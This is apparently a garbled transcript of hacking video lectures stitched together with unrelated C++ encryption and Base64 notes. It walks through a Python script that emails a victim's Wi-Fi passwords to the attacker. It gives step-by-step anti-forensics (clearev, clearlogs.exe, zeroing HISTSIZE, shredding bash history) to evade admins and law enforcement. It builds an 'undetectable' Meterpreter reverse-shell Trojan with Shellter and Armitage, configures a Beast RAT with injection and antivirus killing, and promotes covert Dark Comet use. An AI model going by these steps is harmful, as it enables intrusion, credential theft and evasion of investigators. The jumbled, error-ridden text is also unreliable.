use to send an email with a specific message. Now the nice thing about this is that we can use this function into any other code that we might need. So in order to send an email, we might want to just send an email to a person. So we might want to save a report from our own computer, so we can use it for evil stuff like this, and we're going to use it right now. So basically the way this function works is it takes an email and takes a password into a message. So it starts with server variable, and that is an instance of an SMTP server using the SMTP library. And when we create an object, you have to specify the server that you want to use. So we are going to use the Google server, Google SMTP server, and we are specifying the port of the Google that we use for this server, which is 587. And then we're going to work or initializing the TLS connection. So then we're going to go like use our username and password, then we send the email from our email to our email. Then this pass to the function, and then it squares the server. So now in our code, first of all, we need to change from our previous script. So we need to change something. So what you have to do, you have to change the command to this, because as you can see, this is the command that we are going to put in here, because and this is the result that we will get from our email. So just type this and this. So after that we're going to type. So we spoke about this command, and we can see how it works. Then we're going to using the sub process to run this command, but instead of using a popen that we previously did, we are going to use check underscore output. So this is a function that in sub processes that execute a command and return its result. And we can actually have this detailed lookup on our previous lectures. So previously we opened popen, so that we have to click and open all of those manually, but by doing this check output, it will do automatically. So I'm going to capture that in a variable called the result. So I'm going to use my email. This is my email, and this is the set password, which is this one, abc123 and abc12. Then the content of the message, that is going to be the result, that comment we have done. So this is the result. So basically this is the full code that is what you have to do, and that's all it. And what you have to do, as I previously told, that copy this file into a var or www directory to file, then download this into your Windows machine. So I'm not gonna show this now because as I previously told you. So just run this Python code into your Windows machine and this will just work fine, and that will give you an email to this email. So after running this Python code into a Windows command or Windows terminal, this will just show, this won't show anything after running this Python code. If you just, it will just send you an email, and make sure, and first of all make sure is less secure app access is turned on, because I cannot really show you the email process because as you can see the setting is not available for the account because my account has a two-step verification is enabled. So I cannot really show you the email process, but those who have not who have enabled not enabled this two-step verification, then it will just send, it will go to your email and you can just get all of those results that you got in here. So it will get you all the results in here to your email. Basically I cannot show you, as you can see. It will not show me the less secure apps access. That's why I cannot really show you the, but this will work just fine if you just run this code on your Windows terminal using the way that we previously show in our previous script that I showed you how to just run a Python code on a Windows terminal and how you can transfer from Linux to Windows. So same way, just open or just run this Python code and it will give you an email and send to this specific email that you select in here. So if you just look to your Gmail account and refresh it, and you'll see that you will get a new message, and if you look at the message you will get a sense that it will exactly the same information that the Wi-Fi network showed, like Wi-Fi password and all of this in here. So you can get all the Wi-Fi network information in this email using this server. So you will get like Wi-Fi password or key from this network to your email, and that's how you do it. Hello everyone, so in this lecture we will be talking about how we can hide our tools from our victim machine and cover our tracks and leave no trace behind on the target system. So I'll show you a few ways that we can cover our tracks, making it very difficult for a system admin or forensic investigator or law enforcement agent to track our malicious activities. So log files are most common techniques for a system admin to determine what has taken place on their system. Every unsuccessful login, successful login and security event is logged into a log files. So the first thing we need to do is make certain that there is no trace of our malicious activities in this log files. So in newer version of Metasploit Metapredator, there is a still script called clearrev to clear all event logs, and the program will go into the event logs on a Windows system and clear out all of the logs, and this might looks like a little suspicious to our so it will look suspicious to the vigilant system admin, and most system admin are not vigilant. So at the very least it will remove our connection and or attempt connection from the log files, and of course there may be other evidence left behind such as router logs and IDS logs, and we will deal with this feature. So first, Metasploit to compromise the system and create a Metapredator command prompt. So once we Metapredator session, we simply type just clearrev. As we can see in this screenshot, all of the event logs of the application system and security have been cleared from the log files on the victim machine. Then you can see all has been cleared in here. Then after that, clearing an event logs on Windows machine. So another way to clear on the log files on Windows system is to use clearlogs.exe. You can download from Google. So if we have a physical access to the system, we can simply install it and then run the clear logs, and we can choose to clear the security application and security logs. So to clear the security logs, type clearlogs.exe minus sec, which is security. Then we can go and event viewer and click on the security event. Then we can see that all of the security events have been cleared and there is no trace that we had been in here. So if we have an remote access to the system, we can simply upload it to the system with TFTP and then run on the system. And also one thing to note, that don't forget to remove the clearlogs.exe before leaving the system, as the mere presence of the clearlogs file will be tellable evidence that someone has compromised their system. In Linux system, log files are stored in var/log directory. So we can open and view the plain text containing the log message by opening with any text editor. So before we leave any compromised system, we will want to open this file in our favorite text editor and simply just delete all of those entries. Or if we have time, just carefully go through and delete all the any entries related to specifically on our compromise of the system. Then finally, what we need to do is, before we leave the compromised Linux system, we want to make certain that our command history is erased. Remember the bash shell we are trying, and we will save around 500 command. So a system admin could track all of our command and detect our activities on the system and potentially use them as evidence. So just simply just type this command echo. So the size of our history file is determined by our environment variable, which is this hist size. So we can check the size of a hist size by typing this echo hist size. Then we can then set it as 0 by typing 0 is equal to 0. Now our shell is not store any of our history. So if you remember, change it to 0 before beginning of the hacking, and none of your command will be stored in your terminal. So if you have already written some command, remember to log out and log back and clear your history after the hist size is 0. Then sometimes we won't have enough time to erase the history file or change the hist size variable. So in a hurry, we can actually shred our history file by typing this bash history. And this shred command, this is the shred command with -zu, this one switches will override the history with zeros and it will delete all the files. So that's how we use to clear event logs and all of those. And to check to see if your history has been shaded, you can just simply view the history file by typing the bash history, and it will show you all of those history and logs. So that's how you use event logs on clear all of those by hiding or after using your attacking machine, or after targeting your attacking machine and done with your attacking.
Hey there, let's talk about decrypt in C++. Decrypt function is used to read the encrypted file and decrypt the data and generate a new file, decrypt.txt. To decrypt a file, a key is requested from the user. If the correct key is entered, then the file is successfully decrypted. So encrypt and decrypt text file using C++. Encryption in cryptography and decryption is the process of converting a multimedia. Let's open main.cpp and start coding. First include iostream. Inside third bracket 1. Let's discuss the string encryption and decryption and implement it in C++. Encrypting a string basically means changing it from to another plain text to cheaper text. By changing it to a cheaper text, it has now transformed into a non-readable, non-untrustable form. Encrypted or encoded strings are most of the time used during transmission over the internet. By doing this, it becomes a little bit safe to avoid the man in the middle attacks and also prevent us from many more information leaks or data exposure. Return std cout. One more thing, there are various types of cipher for encryption and decryption, such as Caesar cipher, monoalphabetic cipher, homophonic substitution cipher, polygram substitution cipher, Playfair cipher, Hill cipher. And return std cout, and the message is cannot read input. In this tutorial, we will see how to decrypt a string using the Caesar cipher in C++. Caesar is one of the easiest and simplest encryption technique, yet one of the weakest technique for the encryption of data. And in this type of encrypting technique, each character in the string is replaced by a character who is some fixed number of positions down to it. The position is decided with the help of the key. For example, if the key is 2, then we have to replace the character by another character that is 2 down to it. A couple of things to keep in mind: you do not need to use the streams interface directly. The symmetric cipher interface provides everything you need to cross-platform encryption and decryption operations. The streams are mostly for convenience and interpreting with the web request process. When you use the stream in sync mode, you either need to explicitly call finalize or make sure the destructor of the stream has been called. Finalize makes sure the cipher has been finalized and all hashes in GCM mode have been computed. If this method has not been called, the tag from the cipher may not be accurate when you try to pull it, because encrypted data is binary data. Be sure to use the correct stream flags for binary data. Anything that depends on null terminated C strings can create platforms problems. Use strings and string streams only when you know that the data is plain text. For all other scenarios, use the non-formatted input and output operations on the system. AES GCM with 256-bit keys is not implemented for Apple platforms. Common Crypto does not expose this cheaper mode in its API. As soon as Apple adds AES GCM to its public interface, we will provide an implementation for that platform. If you need AES GCM on Apple, you can use your OpenSSL implementation. Try to avoid seek operations when you seek backwards. We have to reset the cheaper and re-encrypt everything after your seek position. For S3 put object operations, we recommend that you set the content length ahead of time instead of letting us compute it automatically. Be sure to turn off payload hashing. And decryption for the cashier cheaper involves shifting characters to the left rather than to the right as in encryption. The algorithm to decrypt an individual character has a slight change from the encryption algorithm. The change is in step 2 and the addition of the step 3 in step 2 no longer at the shift value but instead subtract it. This reverts the shift we made in the encryption process back to the original text in step 3. Some programming requirements like shipper.cpp contains your main functions null values. The base 64 encode parameter and code mime, those two functions also encode data as base 64. Additionally, they insert a line break after each 64th parameter and 76th mime encoded characters. Base 64 decodes an encoded string. STD string base 64 decode STD string. The parameter remove line breakers needs to be set to true if the encoded string is expected to contain line breaks. For example, because they were encoded with base 64 encode PEM or base 64 encode MIME. And source files, the source code is hosted on GitHub or you guys can nothing is invented, for everything is copied and reused. Twisting a famous, but it's true most problems are just different forms of other problems. This is no different in base 64 decoding is just encoding base 64 characters into bytes. So the solution will be fairly similar to encoding. It will all be clearer when we look at the decoding table. More precisely, we have the following problem. For a given base 64 character, what 6 value did it originally have? In this section, we present similar ideas to base 64 encoding also. After all, it's the same problem, except we are doing the opposite. Specifically, we will use a decoding table to get 6 bit values for each character and also bit shift operations to reconstruct the original bytes. And decoding base 64 strings. Briefly speaking, base 64 decoding a valid string involves splitting the string into partitions of 4 base 64 characters. Following that, we transform each 4 character partition into the original. Hello there. So today I will talk about Trojan. So what is the Trojan? A Trojan horse, Trojan malware, or simply a Trojan is a type of malware. It makes up approximately 51.45% of all malware, which comes as no surprise given the unique traits of a Trojan to infiltrate a device. A Trojan presents itself as legitimate software, but hidden beneath its seemingly harmless exterior are malicious codes that can damage your devices. If you see parallels between Trojan malware and a certain horse of legends, that's because Trojans actually take their name from the Trojan horse. So what Trojan computer viruses? A virus can spread to other devices by creating copies of itself and attaching them to the infected computer software's files and folders. In contrast, when a Trojan infects a device, it says there until the user copies or downloads the malicious program on a different computer. How exactly do Trojans works? Because Trojans don't self-replicate, most Trojan attacks start with tricking the user into downloading, installing, and executing the malware. For example, a hacker might attach a Trojan installer to an email while employing social engineering to get you to open the attachment. If you do, your device will download and install Trojan. How much damage can Trojans do? Delete your files, install additional malware, modify data on your device, copy your data, disrupt your device's performance, steal your personal information. There is a various different types of Trojan. We classify Trojans based on what they are capable of doing. It will depends on the Trojan malicious codes like backdoor Trojan, remote access Trojan, rat exploit, rootkit, banker Trojan, DDoS Trojan, Trojan downloader, Trojan dropper, fake AV Trojans, ransomware Trojan, SMS Trojan, Trojan spy, Trojan mail finder, Trojan ARC bomb, Trojan clicker, Trojan notifier, Trojan proxy, Trojan PSW. So there is some example of Trojan malware attacks. Emotet, AKJB bot, sub 7. This is the example of Trojan attack. Can Trojan affect mobile devices? Trojans target computers primarily, but this doesn't mean that smartphones are any safer from the threat. In fact, there has been a surge of Trojans designed to infect mobile devices. Kaspersky noted a total of 156710 new mobile banking Trojans in 2020 alone. So, Trojan affect mobile devices. Mobile Trojan examples: GIMP banking Trojan, Cerberus, Spy Eye Trojan Android, Spytmo. So, this is the history of Trojans. Detecting and removing Trojans. Check your programs and apps, check your startup programs, check your device's performance. How to remove a Trojan? Open your PC setting, click apps, go to apps features, click the name of the Trojan program, select uninstall. If you're using a Mac, then this is the procedure. Horse definition: a destructive program that masquerades as a beginning application. Users think they are getting a useful piece of software. Unlike viruses, Trojan horses do not replicate themselves. Example: Trojan horse supposed to read computer of viruses, instead introduces viruses onto your computer like antivirus 2009. Look at this one later. So there are many type of malware, and Trojan horse is one of them. A computer program that appears to be useful but that actually does damage. It spares when people are lured into opening a program because they think it comes from a legitimate source. Recently, Trojan horse came in the form of an email that included attachments. Trojan horse can also be included in software that downloaded for free. An example of Trojan horse is Happy 99. It's a malware, and Trojan horse is one of them. Trojan horse example: Trojan horse examples: rootkit integrates with the anti-kernel. It's very dangerous, virtually undetectable once installed, hides from administrator as well as user. Private TCP IP stack. It is Trojan horse examples. Types of Trojan horse payloads. Trojan horse payloads are almost always designed to do various harmful things, but could be harmless. They are broken down in classification based on how the breach system and the damage they cause. The 7 main types of the Trojan horse payloads are remote access, email sending, data destructive, FTP, Trojan, and denial of service attack. Basically, DOS attack. It really a powerful attack. In previous years, DOS in Google and GitHub, hackers gave DOS attack. Trojan horse is a computer program that looks very useful, but when you install the program, it also installs a hidden virus. During the Trojan War, the Greeks gave the Trojans a huge wooden horse as a gift. When the Trojans brought the gift into their city, the Greek soldiers jumped out of the horse and took over the city. Characteristics of modern Trojan: modifies registry to allow auto start each time Windows starts, disables firewall auto update security features, disables or interfaces with added antivirus software adware, hijack thieves, save bots, search and destroy, opens connections to server, sends potentially sensitive information out, keep reinfecting and hijacking machine. So it is modern Trojan's characteristics. So have a look. It's the antivirus avast warning. A Trojan horse was found by Windows antivirus, operating system antivirus. There is no reason to worry. So here a diagram: create Trojan, create developer, execute the dropper, propagation, wrapping. Trojan horses. Trojan horse, also known as Trojan, describes a list of computer threats malware that appear to perform good functions but actually performs malicious functions that allow unauthorized access to the hosting machine. For example, if a program is designed in such a way, it could open a gateway for hackers to control and attack the computer of the user, then that program is said to be a Trojan horse. Computer virus and worm. A computer virus is a program when a code copies itself and replicates itself to other programs, file on a device, and may result in corrupting or damaging the device. And computer worm. A computer worm is an independent malicious program when enters a system can start causing harm, damage to the device. An invitation is required to by the host. Worm only needs to enter the device, then it can automatically affect the other files and programs. Few different types computer viruses include boot sector virus, direct action virus, polymorphic virus, macro virus, specific filler virus, override virus, file infector virus. Few of the different types of computer worms are as follows: internet worms, instant messaging worms, email worms, file sharing worms, internet relay chat. A virus may spared when a file is open and then the same malicious code is copied and spared around whenever other files are opened in the host computer. A worm only requires a medium to enter the device. This may be through the internet, email, online messaging applications, and many. So, create an undetectable Trojan using a domain name. In this tutorial, I'm going to show you how to create an undetectable metadata Trojan using a domain name. I have taken a few guide tutorials and built it into one. So let's begin. Things you will need: Kali Linux, Windows, a IP account with domain name, a forwarded port on your router, and shelter. Part 1: Creating the DNS payload using Kali. Open Metasploit on Kali by typing msf console in a terminal. Type use payload Windows Metapreter reverse TCP DNS. Type show options. This will show you that you need to set your localhost and local port. Type set localhost, type set local port, then type generate -s command. This will show you the options for generating the payload. You can choose different options, but at least do the following. Type generate -f DNS -p Windows -0. Exit the terminal and click on files. Your payload will be in your home. Transfer the created payload to Windows. Part 2: Creating an executable file in Windows. Choose option that applies to you. 32-bit Windows. Navigate to this, right click, choose create new self extraction directive file and click next. Click next on the package purpose page. Type the title of the package. No prompt. Do not display license. Click next. Click add and choose any file on your computer. Click the drop arrow and choose the file name you choose on the last screen. Click next. Choose hidden and then click next. No message. Click next. After this, you can then either choose to save the self extraction directive or don't save. Part 3: Using both created files in shelter to create a Trojan. Open the folder, type A for auto, type N for no, type the location of your created exe file from part 2 and hit enter. Let shelter do its thing for 30 seconds to a minute. When asked a choose payload, type C for custom and type N for no reflective DLL loader. Hit enter to exit shelter. And part 4: Set up your listener. For this, open terminal. Once it's done, type apt-get install Armitage, type msfdbint, click connect, click yes, open Armitage, type set payload, type set extensions false, type set auto run script, migrate -f, this command. Do not upload your created executable to online sites such as VirusTotal. So this is it, guys. Hope you guys liked it and thanks for watching. So another one is a dark comet rat. So what is dark comet rat? It was linked to the Syrian conflict back in 2014. People in Syria started using a secure connection to bypass the government's censorship and surveillance of the net. This caused its government to restore using it to spy on civilians. Most people believe that this led to the arrest of many activists. It was distributed through booby-trapped Skype chat message, which had a message with FB icon, which is reality was an executable file that was designed to install Dark Comet. Once infected, the machine of the victim would try and send messages to other users having this. Once it was linked to the Syrian regime, he stopped making the tool. The Airbus network back in 2012, founded by its evidence being used to target military and gamers by unknown security threats from Africa. At the moment, the target the US mainly in the 2015 attack on Charlie Hebdo magazine in Paris. Security threats used the slogan Jesus Charlie to trick people to download this. It was disguised as a picture of a newborn baby whose whispered read Jesus Charlie. Once it was downloaded, users became compromised. Thieves took advantage of the digester to compromise systems. Within 24 hours of attack, it was stopped. So it is also a Trojan, like Trojan. So this is the latest features of Dark Comet. The following list is not exhaustive, but it's critical one that makes it a dangerous tool. Many of these are used to take over a system and allow clients complete access when granted through UAC spying capabilities. This allows you to spy on various devices. It installs with a very stealth method and does not take many system resources. This keeps it hidden from security solutions or any suspicions from the user. It can read messages, check for any files, read messages from any chat apps like Messenger or WhatsApp for desktop. You can also do this for Android devices using Android app. Network capabilities. This transforms Dark Comet into a completely different tool. It has all the features that other utilities like Wireshark have to offer. On system capabilities. Once it infects the victim with the rat, you give control over 95% of the data on the desktop. It allows you to see all the process running, access command prompt files and other folders. Server capabilities. It also works across a variety of server operating systems. This includes Linux, Windows Server. Some common antivirus tags for this app as are following: Dark Comet and Win32 Dark Comet, BDS, Trojan, backdoor, Win32.Dark Comet. When a system is infected, it tries to establish a connection through the socket to the controller system. Once established, the infected system listens for commands from the controller. If the controller sends out a command, that infected system gets it, executes whatever function is sent. Cyber criminals use Trojans, spam campaigns, Davis file or software download, fake software or unofficial activation tools to trick people into downloading and installing the program, or any malware to trick people into download unwanted installations via cyber criminals. Spam campaigns send emails that carry malicious attachments. When recipients open the files, only then these files install malicious software. These files include PDF documents, Microsoft Office documents, executable files like .exe, archive files like RAR, zip, JavaScript files, and many others. Malware is proliferate through Trojans, but it works only if it is already installed on the system. When installed, it downloads and installs unwanted programs. Untrusted download sources including third-party downloaders, unofficial web pages, peer-to-peer networks like torrent clients, emote, pirate download pages. The fake update tools infect the systems when they download and install these other than updates, fixes, and others, or when they exploit bugs of outdated programs. Unofficial cracking is also known as cracking tools that activate paid software with a single penny. In most cases, such tools are designed by cyber criminals and used to proliferate malicious programs. So, how to save from darknet? Try not to open attachments, files, or click links that are included in irrelevant emails. If you receive them from unknown sources and suspicious addresses, use official sites. Do not trust different third-party downloaders. Update all the installed programs with implemented functions or tools which are provided by official developers. The same applies to the activation of paid programs. It is not legal to bypass payment for licensed software using cracking tools. If your system is infected already, we suggest you run a scan with Combo Cleaner antivirus for Windows to eliminate this. And this is the download Dark Comet Rat for Windows 7, 8, 10, 11. This was all you needed to know for Dark Comet Rat download, which is highly versatile remote administration tool. You can easily use it for gaining remote access on other desktops without making other users aware. Currently in the world, it is used by security researchers, for ethical hackers, for testing the measures in the place different organizations. Hello everyone, in this tutorial, in the last part of Trojan horse viruses, and it was about beast. So far we have discussed Trojan horse viruses characteristics and how to protect your computer from connecting a Trojan horse virus. I'd like to discuss another example of a Trojan horse virus named beast. So here is my beast and a WinRAR archive. This is Trojan. In 2002, Beast was created. It was a Windows-based backdoor Trojan horse, more commonly known in the underground hacking community as a remote administration tool or RAT. It can affect Windows versions 95 to XP and was created by Tata in 2002. So just click Beast. Now this is the dashboard of Beast and the version of Beast is 2.07. So for making a Trojan horse virus, you have to specify host, port, password, port, and some another filter and option is here. So now I have to make a server. I have to build server. So basic port, here I use port just reverse connection. Check this box, reverse connection. Inject in Internal Explorer, inject in explorer.exe, inject in notepad.exe. So whatever I want to select, and notifications, it's the notification settings. including server setting. It became very popular due to its unique features that used the typical client-server model where the client would be under operation by the attacker and the server is what would infect the victim. So this is the configuration about email and get SMTP via this. Beast was one of the first Trojans to feature a reverse connection to its victims. That is, once it was established, the hacker was able to completely control the infected computer. It mainly attacked these three sites. One is Windows MS Agent, ms.com, size ranging from 30 KB to 49 KB. Another one is Windows System 32 MS and size ranging from 30K to 49K, and another one is Windows dxdgns.dll or Windows System 32 dxdgns.dll. Location depend on attacker's choice. Just check this box, two box. It was using the injection method to inject viruses into a specific process, commonly explorer.exe, iexplore.exe, or msnmsgr.exe to steal information and give control to its author of your computer. With Windows XP, you could remove three files listed above in safe mode with system restore turned off, and then you could distinct the system. And Beast came in with a built-in firewall bypasser and had the ability to end antivirus or firewall process. Another feature of a Beast was that it had binder feature that could be used to join two or more files together and then change the icon. So if I want, I can change the server icon. So I choose this. Once connected to the victim, Beast could manipulate files, terminate or execute services, applications, and this is the server. This is the Trojan I created server, 31 KB. Beast is a Windows-based backdoor Trojan horse, more commonly known in the underground cracker commonly as a RAT, remote administrator tool. It is capable of infecting almost all Windows OS. Its targeted infection sites are mainly three. I discuss about it. The default ports used for the direct and reverse connections are 6666 and 9999 respectively. Though the attacker had the option of changing this, Beast came with a built-in firewall bypasser and had the ability of terminating any antivirus or firewall processes. It also came with a blinder that could be used to join two or more files together, then change their icon. The server editor offered these capabilities. I showed direct or reverse connection options, DLL injection, server name, change option, change icon, server installation directory, various IP and server information notification options, emails, ICQ, startup key selection, antivirus and firewall killing, other malicious options. Once connected to the victim, Beast offered the following features: file manager that along with browser victims directories could upload, download, delete or execute any file, remote registry editor, screenshot and webcam capture, utilities, services, applications and processes managers. The victim's computer power options. Some tools mainly for creating nuisance, mouse locking, taskbar hiding, CD-ROM operator and locker, URI opener, wallpaper changer or many things. And I can download a file manager, check all of this. So this is it guys, almost ready, and this is how you guys can make a Trojan virus by the help of using Beast. So hope you guys liked it and thanks for watching. Clipboard tool that could get currently stored strings and password tool of capable of recovering any stored passwords